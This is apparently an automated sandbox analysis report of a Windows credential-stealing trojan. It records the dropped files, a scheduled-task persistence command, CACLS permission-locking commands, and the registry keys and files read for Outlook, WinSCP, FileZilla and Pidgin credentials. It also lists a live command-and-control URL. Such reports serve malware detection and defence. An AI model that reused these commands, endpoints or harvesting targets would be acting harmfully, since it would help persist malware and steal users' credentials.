                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4216Thread sleep time: -720000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 1888Thread sleep time: -50000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4136Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 1900Thread sleep time: -1440000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4216Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe TID: 4136Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 360000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeAPI coverage: 5.0 %
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeAPI coverage: 3.6 %
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405470 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_00405470
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00420C88 FindFirstFileExW,0_2_00420C88
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00420C88 FindFirstFileExW,8_2_00420C88
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00970EEF FindFirstFileExW,8_2_00970EEF
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 50000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 360000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: rundll32.exe, 0000000D.00000002.350105961.000000000296A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418B47 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00418B47
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421EDE GetProcessHeap,0_2_00421EDE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B9E1 mov eax, dword ptr fs:[00000030h]0_2_0041B9E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DFE2 mov eax, dword ptr fs:[00000030h]0_2_0041DFE2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3F4B push dword ptr fs:[00000030h]0_2_006E3F4B
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0041B9E1 mov eax, dword ptr fs:[00000030h]8_2_0041B9E1
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0041DFE2 mov eax, dword ptr fs:[00000030h]8_2_0041DFE2
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0095092B mov eax, dword ptr fs:[00000030h]8_2_0095092B
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0096E249 mov eax, dword ptr fs:[00000030h]8_2_0096E249
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0096BC48 mov eax, dword ptr fs:[00000030h]8_2_0096BC48
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00950D90 mov eax, dword ptr fs:[00000030h]8_2_00950D90
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00418243
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418B47 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00418B47
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CB60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041CB60
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418CAC SetUnhandledExceptionFilter,0_2_00418CAC
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00418243 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00418243
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00418B47 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00418B47
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0041CB60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0041CB60
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_009684AA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_009684AA
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_00968DAE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00968DAE
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeCode function: 8_2_0096CDC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0096CDC7

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 31.41.244.237 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403FB0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,0_2_00403FB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004043C0 ShellExecuteA,0_2_004043C0
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /FJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&ExitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, MainJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /EJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\9c69749b54" /P "user:R" /EJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418967 cpuid 0_2_00418967
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418D81 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00418D81
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00424CA6 _free,_free,_free,GetTimeZoneInformation,_free,0_2_00424CA6
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405470 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_00405470
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B8C0 GetUserNameA,SetCurrentDirectoryA,0_2_0040B8C0

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 8.3.gntuud.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.gntuud.exe.950e67.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.gntuud.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.gntuud.exe.2120000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.gntuud.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.gntuud.exe.2120000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.gntuud.exe.950e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.3.gntuud.exe.990000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.5f0e67.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.file.exe.650000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.311169503.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.326614950.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, type: DROPPED
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Exploitation for Privilege Escalation
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium1
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1
                      Registry Run Keys / Startup Folder
                      211
                      Process Injection
                      2
                      Obfuscated Files or Information
                      1
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      Exfiltration Over Bluetooth1
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)1
                      Services File Permissions Weakness
                      1
                      Scheduled Task/Job
                      2
                      Software Packing
                      2
                      Credentials in Registry
                      2
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Screen Capture
                      Automated Exfiltration1
                      Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)1
                      Registry Run Keys / Startup Folder
                      1
                      Masquerading
                      1
                      Credentials In Files
                      24
                      System Information Discovery
                      Distributed Component Object Model1
                      Email Collection
                      Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon Script1
                      Services File Permissions Weakness
                      21
                      Virtualization/Sandbox Evasion
                      LSA Secrets121
                      Security Software Discovery
                      SSH1
                      Input Capture
                      Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common211
                      Process Injection
                      Cached Domain Credentials21
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Services File Permissions Weakness
                      DCSync1
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc Filesystem1
                      System Owner/User Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 764030 Sample: file.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 Antivirus detection for dropped file 2->59 61 4 other signatures 2->61 8 file.exe 4 2->8         started        12 gntuud.exe 2->12         started        process3 file4 37 C:\Users\user\AppData\Local\...\gntuud.exe, PE32 8->37 dropped 39 C:\Users\user\...\gntuud.exe:Zone.Identifier, ASCII 8->39 dropped 71 Detected unpacking (changes PE section rights) 8->71 73 Detected unpacking (overwrites its own PE header) 8->73 75 Contains functionality to inject code into remote processes 8->75 14 gntuud.exe 17 8->14         started        signatures5 process6 dnsIp7 47 31.41.244.237 AEROEXPRESS-ASRU Russian Federation 14->47 41 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 14->41 dropped 43 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 14->43 dropped 49 Creates an undocumented autostart registry key 14->49 51 Machine Learning detection for dropped file 14->51 53 Uses schtasks.exe or at.exe to add and modify task schedules 14->53 19 rundll32.exe 14->19         started        23 cmd.exe 1 14->23         started        25 schtasks.exe 1 14->25         started        file8 signatures9 process10 dnsIp11 45 192.168.2.4 unknown unknown 19->45 63 System process connects to network (likely due to code injection or exploit) 19->63 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->65 67 Tries to steal Instant Messenger accounts or passwords 19->67 69 2 other signatures 19->69 27 conhost.exe 23->27         started        29 cmd.exe 1 23->29         started        31 cmd.exe 1 23->31         started        35 4 other processes 23->35 33 conhost.exe 25->33         started        signatures12 process13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll100%AviraHEUR/AGEN.1233121
                      C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll100%AviraHEUR/AGEN.1233121
                      C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll88%ReversingLabsWin32.Infostealer.Decred
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll76%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll88%ReversingLabsWin32.Infostealer.Decred
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      31.41.244.237/jg94cVd30f/index.php1%VirustotalBrowse
                      31.41.244.237/jg94cVd30f/index.php100%Avira URL Cloudmalware
                      http://31.41.244.237/jg94cVd30f/index.phpM100%Avira URL Cloudmalware
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      31.41.244.237/jg94cVd30f/index.phptrue
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      low
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://31.41.244.237/jg94cVd30f/index.phpMgntuud.exe, 00000001.00000003.359344808.00000000006A6000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      31.41.244.237
                      unknownRussian Federation
                      61974AEROEXPRESS-ASRUtrue
                      IP
                      192.168.2.4
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:764030
                      Start date and time:2022-12-09 10:31:09 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 45s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:file.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:19
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.evad.winEXE@24/9@0/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 0.2% (good quality ratio 0.2%)
                      • Quality average: 67.3%
                      • Quality standard deviation: 15.3%
                      HCA Information:
                      • Successful, ratio: 88%
                      • Number of executed functions: 21
                      • Number of non-executed functions: 117
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      TimeTypeDescription
                      10:32:16API Interceptor2302x Sleep call for process: gntuud.exe modified
                      10:32:18Task SchedulerRun new task: gntuud.exe path: C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      31.41.244.237XYWF5aWLzq.dllGet hashmaliciousBrowse
                      • 31.41.244.237/jg94cVd30f/index.php
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      AEROEXPRESS-ASRUfile.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      file.exeGet hashmaliciousBrowse
                      • 31.41.244.237
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllfile.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse
                            file.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                file.exeGet hashmaliciousBrowse
                                                  file.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        file.exeGet hashmaliciousBrowse
                                                          file.exeGet hashmaliciousBrowse
                                                            file.exeGet hashmaliciousBrowse
                                                              Process:C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):129024
                                                              Entropy (8bit):6.511981065302762
                                                              Encrypted:false
                                                              SSDEEP:3072:Yx7pOYzBek53tiINwyP7XSSJds3zhrjPcnqULv4i9:Yx7ZNh53vwyOztPc3L
                                                              MD5:C0FD0167E213B6148333351BD16ED1FB
                                                              SHA1:1CFB2B42686557656DEAD53E02D1DB3F2A848026
                                                              SHA-256:C7D804E8FB096769B0E199102BDF8EFA97DFAE1A9B57A479819971146877368B
